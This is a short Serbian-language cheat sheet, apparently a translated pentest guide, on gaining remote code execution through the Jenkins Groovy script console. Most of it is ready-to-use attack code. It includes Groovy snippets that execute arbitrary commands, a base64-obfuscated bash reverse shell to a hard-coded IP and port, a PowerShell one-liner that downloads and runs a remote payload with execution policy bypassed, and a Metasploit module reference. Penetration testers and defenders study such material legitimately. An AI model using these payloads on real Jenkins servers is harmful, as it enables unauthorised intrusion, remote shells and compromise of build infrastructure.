Jenkins RCE sa Groovy skriptom

Reading time: 3 minutes

Jenkins RCE sa Groovy skriptom

Ovo je manje bučno nego kreiranje novog projekta u Jenkinsu

1. Idite na path_jenkins/script
2. Unutar tekstualnog okvira unesite skript

def process = "PowerShell.exe <WHATEVER>".execute()
println "Found text ${process.text}"

Možete izvršiti komandu koristeći: cmd.exe /c dir

U linuxu možete uraditi: "ls /".execute().text

Ako trebate koristiti navodnike i jednostruke navodnike unutar teksta. Možete koristiti """PAYLOAD""" (trostruki dvostruki navodnici) za izvršavanje payload-a.

Još jedan koristan groovy skript je (zameni [INSERT COMMAND]):

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '[INSERT COMMAND]'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Obrnuta ljuska u linuxu

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Обратна љуска у Виндовс

Можете припремити HTTP сервер са PS обратном љуском и користити Jeking да је преузмете и извршите:

scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')"
echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc <BASE64>

Скрипт

Можете автоматизовати овај процес са овим скриптом.

Можете користити MSF да добијете реверзну шелл:

msf> use exploit/multi/http/jenkins_script_console